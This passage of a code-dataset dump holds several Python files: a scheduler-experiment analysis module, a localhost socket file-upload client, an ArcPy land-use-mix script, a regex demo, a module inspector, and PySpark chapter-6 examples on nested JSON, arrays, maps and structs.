{}\n for _, row in df.iterrows():\n t = row[\"type\"]\n node = 
HOSTNAME_TO_NODE[row[\"host_name\"]]\n ai_name = row[\"ai_name\"]\n\n new_record = (node, t)\n present_record = ai_name_to_host_and_type.get(ai_name, new_record)\n if present_record != new_record:\n raise ValueError(f\"{ai_name} - two vms give different results {present_record} vs {new_record}\")\n ai_name_to_host_and_type[ai_name] = new_record\n return ai_name_to_host_and_type\n\n def checkOneAIOneHost(self):\n path = os.path.join(self.path, f\"VM_management_{self.expid}.csv\")\n df = pd.read_csv(path, skiprows=57)\n for ai in df[\"ai_name\"].unique():\n host_names = df.loc[(df[\"ai_name\"] == ai), \"host_name\"].unique()\n if len(host_names) != 1:\n raise ValueError(f\"Ai spans more than one host {self.expid} {ai} {host_names}\")\n\n\nclass SchedulerExperimentSeries:\n def __init__(self, base_path, config, ai_count, skip_compositions=()):\n self.type = \"scheduler\"\n self.base_path = base_path\n _, self.name = os.path.split(base_path)\n self.ai_role_count = ai_info.AI_ROLE_TO_COUNT.copy()\n self.rescale_map = config.rescale_map # hostname to exp_series\n self.ai_count = ai_count\n self.ai_types = config.tasks\n\n self.experiments = dict()\n self.dfs = {}\n self.df = None\n self.schedules = pd.DataFrame()\n\n if config.ai_role_count:\n self.ai_role_count.update(config.ai_role_count)\n\n for exp_match in self.getExperimentPathsMatches(base_path):\n composition_id, shuffle_id, custom_scheduler = exp_match.groups()\n composition_id = int(composition_id)\n if composition_id in skip_compositions:\n print(f\"Skipping composition {composition_id}\")\n continue\n shuffle_id = int(shuffle_id)\n custom_scheduler = \"\" if custom_scheduler is None else str(custom_scheduler)\n exp = SchedulerExperimentRecord(base_path, exp_match.string,\n composition_id, shuffle_id, custom_scheduler, self.ai_types, self)\n self.experiments[(composition_id, shuffle_id, custom_scheduler)] = exp\n self.readPerf()\n self.aggregatePerf()\n self.rescalePerf()\n self.computeCost()\n\n def getPerfMetricsForType(self, t1):\n return METRIC_CBTOOL_PREFIX + ai_info.AI_TYPE_TO_METRICS[t1][0]\n\n def readPerf(self):\n print(\"Getting perf data\")\n perf = pd.DataFrame()\n for k, exp in self.experiments.items():\n composition_id, shuffle_id, custom_scheduler = k\n df = readExp(exp)\n df[\"exp_id\"] = exp.expid\n df[\"composition_id\"] = composition_id\n df[\"shuffle_id\"] = shuffle_id\n df[\"custom_scheduler\"] = custom_scheduler\n perf = perf.append(df, ignore_index=True)\n self.dfs[\"perf\"] = perf\n\n def aggregatePerf(self):\n results = pd.DataFrame()\n perf = self.dfs[\"perf\"]\n for k, exp in self.experiments.items():\n df = perf.loc[(perf[\"exp_id\"] == exp.expid), :]\n result = exp.aggregatePerf(df)\n results = results.append(result, ignore_index=True)\n self.dfs[\"perf_agg\"] = results\n self.df = results\n\n def rescalePerf(self):\n for expid in self.df[\"exp_id\"].unique():\n df = self.df.loc[self.df[\"exp_id\"] == expid]\n for ai_name in df[\"ai_name\"].unique():\n df2 = df.loc[df[\"ai_name\"] == ai_name, :]\n host_names = df2[\"host_name\"].unique()\n if host_names.size != 1:\n raise ValueError(f\"Unexpected number of host names for single ai_name {ai_name} \"\n f\"{len(host_names)} != 1\")\n node = HOSTNAME_TO_NODE[host_names[0]]\n t = df2[\"type\"].min()\n for metric in ai_info.AI_TYPE_TO_METRICS[t]:\n factor = self.rescale_map[node][t][metric]\n select = (self.df[\"exp_id\"] == expid) & (df[\"ai_name\"] == ai_name)\n for mt in [\"avg_\", \"std_\"]:\n input_col = f\"{mt}{metric}\"\n output_col = 
f\"rescaled_{input_col}\"\n self.df.loc[select, output_col] = self.df.loc[select, input_col] / factor\n\n def computeCost(self):\n for expid in self.df[\"exp_id\"].unique():\n df = self.df.loc[self.df[\"exp_id\"] == expid]\n for ai_name in df[\"ai_name\"].unique():\n df2 = df.loc[df[\"ai_name\"] == ai_name, :]\n t = df2[\"type\"].min()\n metric = ai_info.AI_TYPE_TO_METRICS[t][0]\n output_col = \"cost\"\n input_col = f\"rescaled_avg_{metric}\"\n select = (self.df[\"exp_id\"] == expid) & (df[\"ai_name\"] == ai_name)\n if metric == \"throughput\":\n self.df.loc[select, output_col] = 1. / self.df.loc[select, input_col]\n else:\n self.df.loc[select, output_col] = self.df.loc[select, input_col]\n select = self.df.exp_id == expid\n self.df.loc[select, \"max_cost\"] = self.df.loc[select, \"cost\"].max()\n\n def printExperimentResults(self, savefig=False):\n xs = []\n ys_map = {s: [] for s in sorted(self.df[\"scheduler\"].unique())}\n for i, composition in enumerate(sorted(self.df[\"composition_id\"].unique())):\n xs.append(i)\n for scheduler in sorted(self.df[\"scheduler\"].unique()):\n select = (self.df[\"composition_id\"] == composition) & (self.df[\"scheduler\"] == scheduler)\n ys_map[scheduler].append(self.df.loc[select, \"max_cost\"].min())\n fig, ax = plt.subplots()\n plt.title(\"Scheduler cost\")\n for k, v in ys_map.items():\n ax.scatter(xs, v, label=k[1:])\n ax.set_ylabel(\"Max observed cost\")\n ax.legend()\n if savefig:\n file_name = f\"scheduler_results_{self.name}\"\n file_name = os.path.join(global_config.PLOTS_DIR, file_name)\n plt.savefig(file_name)\n else:\n plt.show()\n return xs, ys_map\n\n @staticmethod\n def getExperimentPathsMatches(base_path):\n path_regex = \"([0-9]{1,4})scheduler([0-9]{1,2})(_custom|_random|_round_robin|_default){0,1}\"\n\n def matchExpidRegex(e):\n i = e.split(\"/\")[-1]\n return re.fullmatch(path_regex, i)\n\n pattern = os.path.join(base_path, f\"*\")\n expids = glob.glob(pattern)\n matches = [matchExpidRegex(e) for e in expids]\n return [m for m in matches if bool(m)]\n\n def computeScheduleSummarySingle(self, exp, hosts, columns, index):\n result = pd.DataFrame(np.zeros((1, len(columns)), dtype=np.int32), index=index, columns=columns)\n ai_name_to_host_and_type = exp.computeAINameToHostAndTypeMap(self.df)\n\n for _, host_and_type in ai_name_to_host_and_type.items():\n result.loc[:, host_and_type] += 1\n result.loc[:, (host_and_type[0], \"all\")] += 1\n\n for host in hosts:\n for t in (\"all\",) + self.ai_types:\n result.loc[:, (\"all\", t)] += result.loc[:, (host, t)]\n return result\n\n # TODO shuffle id resilient\n def computeScheduleSummary(self):\n self.schedules = pd.DataFrame()\n hosts = list(self.df[\"host_name\"].unique())\n hosts = sorted([HOSTNAME_TO_NODE[h] for h in hosts])\n columns = pd.MultiIndex.from_product([[\"all\"] + hosts, (\"all\",) + tuple(self.ai_types)])\n for composition_id in sorted(self.df[\"composition_id\"].unique()):\n for shuffle_id in [0]:\n for scheduler in sorted(self.df[\"scheduler\"].unique()):\n exp = self.experiments[(composition_id, shuffle_id, scheduler)]\n index = pd.MultiIndex.from_tuples([(composition_id, scheduler)], names=[\"composition\", \"scheduler\"])\n result = self.computeScheduleSummarySingle(exp, hosts, columns, index)\n self.schedules = self.schedules.append(result)\n\n def extractNodeToLoads(self, composition_id, shuffle_id, scheduler):\n results = {}\n schedule = self.schedules.loc[(composition_id, scheduler)]\n hosts = [h for h in schedule.index.levels[0] if h != \"all\"]\n for host in hosts:\n 
result = np.zeros(len(self.ai_types))\n for i, ai_type in enumerate(self.ai_types):\n result[i] = schedule[(host, ai_type)]\n results[host] = result\n return results\n\n def extractActualCosts(self, composition_id, shuffle_id, scheduler):\n xs = []\n values = []\n df = self.df\n select = (df[\"composition_id\"] == composition_id) & (df[\"shuffle_id\"] == shuffle_id) & (df[\"scheduler\"] == scheduler)\n df = df.loc[select, :]\n for _, row in df.iterrows():\n values.append(row[\"cost\"])\n node = HOSTNAME_TO_NODE[row[\"host_name\"]]\n t = row[\"type\"]\n xs.append(f\"{node} {t}\")\n return xs, values\n\n\nclass SchedulerMeanMetricComputer:\n RecordId = collections.namedtuple(\"RecordId\", \"host type composition scheduler\")\n\n def __init__(self, ai_types, node_to_coeffs, xs, ys_actual, ys_expected):\n self.ai_types = ai_types\n self.node_to_coeffs = node_to_coeffs\n self.xs = xs\n self.ys_actual = ys_actual\n self.ys_expected = ys_expected\n\n def computeMetricForType(self, t=None, metric_fn=mean_squared_error):\n data = self.getDataForType(t)\n _, ys_actual, ys_expected = zip(*data)\n return metric_fn(ys_actual, ys_expected)\n\n def getDataForType(self, t):\n data = zip(self.xs, self.ys_actual, self.ys_expected)\n if t is None:\n return data\n return [(x, y1, y2) for (x, y1, y2) in data if x.type == t]\n\n def computeMetrics(self, metric_fn=mean_squared_error):\n result = dict()\n result[\"all\"] = self.computeMetricForType(metric_fn=metric_fn)\n for t in self.ai_types:\n result[t] = self.computeMetricForType(t, metric_fn)\n return result\n\n @staticmethod\n def createFromExpSeries(exp_series, node_to_coeffs):\n xs_result, ys_actual_result, ys_expected_result = [], [], []\n df = exp_series.df\n\n def toRecordId(x, c, s):\n host, t = x.split(\" \")\n return SchedulerMeanMetricComputer.RecordId(host, t, composition, scheduler)\n\n for composition in df[\"composition_id\"].unique():\n for scheduler in df[\"scheduler\"].unique():\n node_to_loads = exp_series.extractNodeToLoads(composition, 0, scheduler)\n xs, ys_expected = computeExpectedCostMultipleNodes(exp_series.ai_types, node_to_loads, node_to_coeffs)\n expected_cost_map = dict(zip(xs, ys_expected))\n\n xs, ys_actual = exp_series.extractActualCosts(composition, 0, scheduler)\n for x, y_actual in zip(xs, ys_actual):\n xs_result.append(toRecordId(x, composition, scheduler))\n ys_actual_result.append(y_actual)\n ys_expected_result.append(expected_cost_map[x])\n return SchedulerMeanMetricComputer(exp_series.ai_types, node_to_coeffs, xs_result,\n ys_actual_result, ys_expected_result)\n\n\ndef computeExpectedCostMultipleNodes(ai_types, node_to_loads, node_to_coefficients):\n values = []\n xs = []\n for node in node_to_loads.keys():\n values.extend(computeExpectedCost(node_to_loads[node], node_to_coefficients[node]))\n xs.extend([f\"{node} {t}\" for t in ai_types])\n return xs, values\n\n\ndef plotActualVsExpectedCost(exp_series, node_to_coefficients, composition_id, savefig=False):\n k = len(exp_series.df[\"scheduler\"].unique())\n fig, axs = plt.subplots(1, k, figsize=(k * 5, 4))\n schedulers, actual_res, model_res = [], [], []\n\n def updateResultList(result, result_list, ymax):\n ymax = max([ymax] + result[1])\n result_list.append(result)\n return ymax\n\n ymax = 0\n for i, scheduler in enumerate(sorted(exp_series.df[\"scheduler\"].unique())):\n schedulers.append(scheduler)\n actual = exp_series.extractActualCosts(composition_id, 0, scheduler)\n ymax = updateResultList(actual, actual_res, ymax)\n\n node_to_loads = 
exp_series.extractNodeToLoads(composition_id, 0, scheduler)\n model = computeExpectedCostMultipleNodes(exp_series.ai_types, node_to_loads, node_to_coefficients)\n ymax = updateResultList(model, model_res, ymax)\n\n for i, (scheduler, actual, model) in enumerate(zip(schedulers, actual_res, model_res)):\n xs_model, values_model = model\n xs_actual, values_actual = actual\n ax = axs[i]\n\n ax.set_title(f\"{scheduler[1:]} scheduler\")\n ax.set_ylabel(\"Performance cost\")\n ax.scatter(xs_model, values_model, label=\"predicted\")\n ax.scatter(xs_actual, values_actual, label=\"observed\")\n ax.tick_params('x', labelrotation=60)\n ax.set_ylim(ymin=0, ymax=ymax)\n ax.legend()\n\n if savefig:\n file_name = f\"scheduler_observed_vs_predicted_{exp_series.name}_{composition_id}\"\n file_name = os.path.join(global_config.PLOTS_DIR, file_name)\n plt.savefig(file_name)\n else:\n plt.show()\n\n return schedulers, actual_res, model_res\n\n","sub_path":"myscripts/analyze_scheduler.py","file_name":"analyze_scheduler.py","file_ext":"py","file_size_in_byte":16871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"198729193","text":"#!/usr/bin/env python\nimport socket\nimport os\nimport sys\n\n\nHOST = '127.0.0.1'\nPORT = 10037\n\ndef file_client():\n ''' Client side of the file server '''\n\n file_in = input('input > ')\n # On Windows the backslash path separators need to be replaced\n file_in = file_in.replace(\"\\\\\", \"/\")\n #print(file_in)\n # Check that the file to upload exists\n if not os.path.isfile(file_in):\n print(\"File does not exist\")\n sys.exit()\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((HOST, PORT))\n # Get the file name\n file_in_dirname = os.path.basename(file_in)\n # Send \"filename\" + the file name so the server can regex-match it\n file_in_name =\"filename\" + file_in_dirname.strip()\n # Send the file name\n s.sendall(file_in_name.encode())\n # Transfer the file contents\n with open(file_in, \"rb\") as f:\n datas = f.read()\n s.sendall(datas)\n f.close()\n s.close()\n\n\nif __name__ == '__main__':\n file_client()","sub_path":"week02/cookie-client-file.py.py","file_name":"cookie-client-file.py.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"365609168","text":"'''\r\nCreated on 20141016\r\n\r\n@author: xiaogelunbu\r\n'''\r\n\r\n\r\nimport arcpy\r\nfrom arcpy import env\r\nimport math\r\nimport os\r\n\r\n\r\n\r\narcpy.env.overwriteOutput=True\r\ntempData = arcpy.env.scratchGDB+os.path.sep+\"output\"\r\n\r\n\r\nfcparcel=arcpy.GetParameterAsText(0)\r\nfcpoi1=arcpy.GetParameterAsText(1)\r\nfcpoi2=arcpy.GetParameterAsText(2)\r\nfcpoi3=arcpy.GetParameterAsText(3)\r\nfcpoi4=arcpy.GetParameterAsText(4)\r\naddfieldname=arcpy.GetParameterAsText(5)\r\n\r\n\r\ntargetFeatures = fcparcel\r\njoinFeatures1 = fcpoi1\r\njoinFeatures2 = fcpoi2\r\njoinFeatures3 = fcpoi3\r\njoinFeatures4 = fcpoi4\r\na=0\r\n\r\n#Run the Spatial Join tool, using the defaults for the join operation and join type\r\narcpy.SpatialJoin_analysis(targetFeatures, joinFeatures1, tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi1count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi1count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\n
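# Note: the same join -> count -> cleanup block is repeated verbatim for\r\n# joinFeatures2-4 below; a loop over the four joinFeatures inputs would\r\n# avoid the duplication.\r\n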
tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi2count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi2count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\narcpy.SpatialJoin_analysis(targetFeatures, joinFeatures3, tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi3count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi3count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\narcpy.SpatialJoin_analysis(targetFeatures, joinFeatures4, tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi4count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi4count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\narcpy.DeleteField_management(fcparcel,addfieldname)\r\narcpy.AddField_management(fcparcel,addfieldname,\"FLOAT\")\r\n\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n if a!=0:\r\n row.setValue(addfieldname, -1.0*((row.poi1count/a)*math.log(row.poi1count/a)+(row.poi2count/a)*math.log(row.poi2count/a)+(row.poi3count/a)*math.log(row.poi3count/a)+(row.poi4count/a)*math.log(row.poi4count/a))/math.log(4))\r\n cur.updateRow(row)\r\n else:\r\n row.setValue(addfieldname, 0)\r\n cur.updateRow(row)\r\n\r\n\r\narcpy.DeleteField_management(fcparcel, [\"poi1count\",\"poi2count\",\"poi3count\"\"poi4count\"])\r\narcpy.Delete_management(tempData)\r\n\r\n\r\n\r\n","sub_path":"05Land-Use-Mix1/05Land-Use-Mix1.py","file_name":"05Land-Use-Mix1.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"237503305","text":"# re模块其他用法\nimport re\n\n\ndef main():\n # 查找\n ret = re.search(r\"\\d+\", \"hello 100,200\")\n # 查找所有\n ret2 = re.findall(r\"\\d+\", \"hello 100,200\")\n # 替换\n ret3 = re.sub(r\"\\d+\", \"300\", \"hello 100,200\")\n # 切割字符串,用空格和:冒号分割字符串\n ret4 = re.split(r\":| \", \"info:dave 22 male\")\n print(ret)\n print(ret2)\n print(ret3)\n print(ret4)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"正则表达式/demo04.py","file_name":"demo04.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395309324","text":"#!/usr/bin/env python\n\nimport importlib\nimport inspect\nimport os\nimport sys\n\n# Add the path of the module you want to inspect here, if necessary\nsys.path.insert(1,\"test\" )\n\nfiles=[]\n\n\n\t\nimport test.b as target\nfrom test.b import *\n\n# Keep track of inspected modules here\ninspected = []\n\n# Define some functions for inspecting child members, so they \n# can be used recursively\ndef module_classes(module):\n \"\"\"\nPrints a 
recursive list of package-members\n\"\"\"\n inspected.append(module)\n print('='*80)\n print(module)\n print('-'*80)\n members = inspect.getmembers(module, inspect.isclass)\n for member in members:\n print(member[0], member[1].__mro__)\n print('='*80)\n children = inspect.getmembers(module, inspect.ismodule)\n if children:\n for child in children:\n if child[1] not in inspected:\n importlib.import_module(module.__name__, child[0])\n print()\n module_classes(child[1])\n\nmodule_classes(target)\n","sub_path":"parseClasses.py","file_name":"parseClasses.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"294646570","text":"\"\"\"Code for the PySpark In Action book, chapter 6.\"\"\"\n\n# pylint: disable=C0302, C0413\n\n# tag::ch06-reading-json-python[]\nimport json # <1>\n\nsample_json = \"\"\"{\n \"id\": 143,\n \"name\": \"Silicon Valley\",\n \"type\": \"Scripted\",\n \"language\": \"English\",\n \"genres\": [\n \"Comedy\"\n ],\n \"network\": {\n \"id\": 8,\n \"name\": \"HBO\",\n \"country\": {\n \"name\": \"United States\",\n \"code\": \"US\",\n \"timezone\": \"America/New_York\"\n }\n }\n}\"\"\"\n\ndocument = json.loads(sample_json)\nprint(document) # <2>\n# {'id': 143,\n# 'name': 'Silicon Valley',\n# 'type': 'Scripted',\n# 'language': 'English',\n# 'genres': ['Comedy'],\n# 'network': {'id': 8,\n# 'name': 'HBO',\n# 'country': {'name': 'United States',\n# 'code': 'US',\n# 'timezone': 'America/New_York'}}}\n\ntype(document)\n# dict <3>\n\n# end::ch06-reading-json-python[]\n\n# tag::ch06-reading-the-data[]\n\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession.builder.getOrCreate()\n\nshows = spark.read.json(\"../../data/Ch06/shows-silicon-valley.json\") # <1>\n\nshows.count()\n# 1 <2>\n# end::ch06-reading-the-data[]\n\nassert shows.count() == 1\n\n# tag::ch06-json-multi[]\n\nthree_shows = spark.read.json(\n \"../../data/Ch06/shows-*.json\", multiLine=True\n)\n\nthree_shows.count()\n# 3\n\nassert three_shows.count() == 3\n\n# end::ch06-json-multi[]\n\n# tag::ch06-json-print-schema[]\n\nshows.printSchema()\n# root <1>\n# |-- _embedded: struct (nullable = true) <2>\n# | |-- episodes: array (nullable = true)\n# | | |-- element: struct (containsNull = true)\n# | | | |-- _links: struct (nullable = true)\n# | | | | |-- self: struct (nullable = true)\n# | | | | | |-- href: string (nullable = true)\n# | | | |-- airdate: string (nullable = true)\n# | | | |-- airstamp: string (nullable = true)\n# | | | |-- airtime: string (nullable = true)\n# | | | |-- id: long (nullable = true)\n# | | | |-- image: struct (nullable = true)\n# | | | | |-- medium: string (nullable = true)\n# | | | | |-- original: string (nullable = true)\n# | | | |-- name: string (nullable = true)\n# | | | |-- number: long (nullable = true)\n# | | | |-- runtime: long (nullable = true)\n# | | | |-- season: long (nullable = true)\n# | | | |-- summary: string (nullable = true)\n# | | | |-- url: string (nullable = true)\n# |-- _links: struct (nullable = true)\n# | |-- previousepisode: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# | |-- self: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# |-- externals: struct (nullable = true)\n# | |-- imdb: string (nullable = true)\n# | |-- thetvdb: long (nullable = true)\n# | |-- tvrage: long (nullable = true)\n# |-- genres: array (nullable = true)\n# | |-- element: string (containsNull = true)\n# |-- id: long (nullable = true)\n# [and more columns...]\n\n# 
end::ch06-json-print-schema[]\n\n\n# tag::ch06-first-layer-col[]\n\nprint(shows.columns)\n\n# ['_embedded', '_links', 'externals', 'genres', 'id', 'image',\n# 'language', 'name', 'network', 'officialSite', 'premiered',\n# 'rating', 'runtime', 'schedule', 'status', 'summary', 'type',\n# 'updated', 'url', 'webChannel', 'weight']\n\n# end::ch06-first-layer-col[]\n\n# tag::ch06-array-column[]\narray_subset = shows.select(\"name\", \"genres\")\n\narray_subset.show(1, False)\n# +--------------+--------+\n# |name |genres |\n# +--------------+--------+\n# |Silicon Valley|[Comedy]|\n# +--------------+--------+\n\n# end::ch06-array-column[]\n\n# tag::ch06-array-index[]\nimport pyspark.sql.functions as F\n\narray_subset = array_subset.select(\n \"name\",\n array_subset.genres[0].alias(\"dot_and_index\"), # <1>\n F.col(\"genres\")[0].alias(\"col_and_index\"),\n array_subset.genres.getItem(0).alias(\"dot_and_method\"), # <2>\n F.col(\"genres\").getItem(0).alias(\"col_and_method\"),\n)\n\narray_subset.show()\n\n# +--------------+-------------+-------------+--------------+--------------+\n# | name|dot_and_index|col_and_index|dot_and_method|col_and_method|\n# +--------------+-------------+-------------+--------------+--------------+\n# |Silicon Valley| Comedy| Comedy| Comedy| Comedy|\n# +--------------+-------------+-------------+--------------+--------------+\n\n# end::ch06-array-index[]\n\n# tag::ch06-array-discovery[]\narray_subset_repeated = array_subset.select(\n \"name\",\n F.lit(\"Comedy\").alias(\"one\"),\n F.lit(\"Horror\").alias(\"two\"),\n F.lit(\"Drama\").alias(\"three\"),\n F.col(\"dot_and_index\"),\n).select(\n \"name\",\n F.array(\"one\", \"two\", \"three\").alias(\"Some_Genres\"), # <1>\n F.array_repeat(\"dot_and_index\", 5).alias(\"Repeated_Genres\"), # <2>\n)\n\narray_subset_repeated.show(1, False)\n\n# +--------------+-----------------------+----------------------------------------+\n# |name |Some_Genres |Repeated_Genres |\n# +--------------+-----------------------+----------------------------------------+\n# |Silicon Valley|[Comedy, Horror, Drama]|[Comedy, Comedy, Comedy, Comedy, Comedy]|\n# +--------------+-----------------------+----------------------------------------+\n\narray_subset_repeated.select(\n \"name\", F.size(\"Some_Genres\"), F.size(\"Repeated_Genres\") # <3>\n).show()\n\n# +--------------+-----------------+---------------------+\n# | name|size(Some_Genres)|size(Repeated_Genres)|\n# +--------------+-----------------+---------------------+\n# |Silicon Valley| 3| 5|\n# +--------------+-----------------+---------------------+\n\narray_subset_repeated.select(\n \"name\",\n F.array_distinct(\"Some_Genres\"), # <4>\n F.array_distinct(\"Repeated_Genres\"), # <4>\n).show(1, False)\n\n# +--------------+---------------------------+-------------------------------+\n# |name |array_distinct(Some_Genres)|array_distinct(Repeated_Genres)|\n# +--------------+---------------------------+-------------------------------+\n# |Silicon Valley|[Comedy, Horror, Drama] |[Comedy] |\n# +--------------+---------------------------+-------------------------------+\n\narray_subset_repeated = array_subset_repeated.select(\n \"name\",\n F.array_intersect(\"Some_Genres\", \"Repeated_Genres\").alias( # <5>\n \"Genres\"\n ),\n)\n\narray_subset_repeated.show()\n\n# +--------------+--------+\n# | name| Genres|\n# +--------------+--------+\n# |Silicon Valley|[Comedy]|\n# +--------------+--------+\n\n# end::ch06-array-discovery[]\n\n# tag::ch06-array-position[]\n\narray_subset_repeated.select(\n \"Genres\", 
F.array_position(\"Genres\", \"Comedy\")\n).show()\n\n# +--------+------------------------------+\n# | Genres|array_position(Genres, Comedy)|\n# +--------+------------------------------+\n# |[Comedy]| 1|\n# +--------+------------------------------+\n\n# end::ch06-array-position[]\n\n# tag::ch06-map-creation[]\n\ncolumns = [\"name\", \"language\", \"type\"]\n\nshows_map = shows.select(\n *[F.lit(column) for column in columns],\n F.array(*columns).alias(\"values\")\n)\n\nshows_map = shows_map.select(F.array(*columns).alias(\"keys\"), \"values\")\n\nshows_map.show(1)\n# +--------------------+--------------------+\n# | keys| values|\n# +--------------------+--------------------+\n# |[name, language, ...|[Silicon Valley, ...|\n# +--------------------+--------------------+\n\nshows_map = shows_map.select(\n F.map_from_arrays(\"keys\", \"values\").alias(\"mapped\")\n)\n\nshows_map.printSchema()\n\n# root\n# |-- mapped: map (nullable = false)\n# | |-- key: string\n# | |-- value: string (valueContainsNull = true)\n\nshows_map.show(1, False)\n\n# +---------------------------------------------------------------+\n# |mapped |\n# +---------------------------------------------------------------+\n# |[name -> Silicon Valley, language -> English, type -> Scripted]|\n# +---------------------------------------------------------------+\n\nshows_map.select(\n F.col(\"mapped.name\"), # <1>\n F.col(\"mapped\")[\"name\"], # <2>\n shows_map.mapped[\"name\"], # <3>\n).show()\n\n# +--------------+--------------+--------------+\n# | name| mapped[name]| mapped[name]|\n# +--------------+--------------+--------------+\n# |Silicon Valley|Silicon Valley|Silicon Valley|\n# +--------------+--------------+--------------+\n\n# end::ch06-map-creation[]\n\n# tag::ch06-struct-subset[]\nshows.select(\"schedule\").printSchema()\n\n# root\n# |-- schedule: struct (nullable = true) <1>\n# | |-- days: array (nullable = true)\n# | | |-- element: string (containsNull = true)\n# | |-- time: string (nullable = true)\n\n# end::ch06-struct-subset[]\n\n# tag::ch06-embedded[]\n\nshows.select(F.col(\"_embedded\")).printSchema()\n# root\n# |-- _embedded: struct (nullable = true) <1>\n# | |-- episodes: array (nullable = true) <2>\n# | | |-- element: struct (containsNull = true)\n# | | | |-- _links: struct (nullable = true) <3>\n# | | | | |-- self: struct (nullable = true)\n# | | | | | |-- href: string (nullable = true)\n# | | | |-- airdate: string (nullable = true)\n# | | | |-- id: long (nullable = true)\n# | | | |-- image: struct (nullable = true)\n# | | | | |-- medium: string (nullable = true)\n# | | | | |-- original: string (nullable = true)\n# | | | |-- name: string (nullable = true)\n# | | | |-- number: long (nullable = true)\n# | | | |-- runtime: long (nullable = true)\n# | | | |-- season: long (nullable = true)\n# | | | |-- summary: string (nullable = true)\n# | | | |-- url: string (nullable = true)\n\n# end::ch06-embedded[]\n\n# tag::ch06-promote-to-column[]\nshows_clean = shows.withColumn(\"episodes\", F.col(\"_embedded.episodes\")).drop(\n \"_embedded\"\n)\n\nshows_clean.printSchema()\n# root\n# |-- _links: struct (nullable = true)\n# | |-- previousepisode: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# | |-- self: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# |-- externals: struct (nullable = true)\n# | |-- imdb: string (nullable = true)\n# [...]\n# |-- episodes: array (nullable = true) <1>\n# | |-- element: struct (containsNull = true)\n# | | |-- _links: struct (nullable = true)\n# | | 
| |-- self: struct (nullable = true)\n# | | | | |-- href: string (nullable = true)\n# | | |-- airdate: string (nullable = true)\n# | | |-- airstamp: string (nullable = true)\n# | | |-- airtime: string (nullable = true)\n# | | |-- id: long (nullable = true)\n# | | |-- image: struct (nullable = true)\n# | | | |-- medium: string (nullable = true)\n# | | | |-- original: string (nullable = true)\n# [... rest of schema]\n# end::ch06-promote-to-column[]\n\n# tag::ch06-array-struct[]\n\nepisodes_name = shows_clean.select(F.col(\"episodes.name\")) # <1>\nepisodes_name.printSchema()\n\n# root\n# |-- name: array (nullable = true)\n# | |-- element: string (containsNull = true)\n\nepisodes_name.select(F.explode(\"name\").alias(\"name\")).show(3, False) # <2>\n# +-------------------------+\n# |name |\n# +-------------------------+\n# |Minimum Viable Product |\n# |The Cap Table |\n# |Articles of Incorporation|\n# +-------------------------+\n# end::ch06-array-struct[]\n\n# tag::ch06-schema-example[]\nshows.printSchema()\n# root # <1>\n# |-- _links: struct (nullable = true)\n# | |-- previousepisode: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# | |-- self: struct (nullable = true)\n# | | |-- href: string (nullable = true)\n# |-- externals: struct (nullable = true)\n# | |-- imdb: string (nullable = true)\n# [... rest of schema]\n# end::ch06-schema-example[]\n\n# tag::ch06-first-part-schema[]\n\nimport pyspark.sql.types as T\n\nepisode_links_schema = T.StructType(\n [T.StructField(\"self\", T.StructType([T.StructField(\"href\", T.StringType())]))]\n) # <1>\n\nepisode_image_schema = T.StructType(\n [\n T.StructField(\"medium\", T.StringType()),\n T.StructField(\"original\", 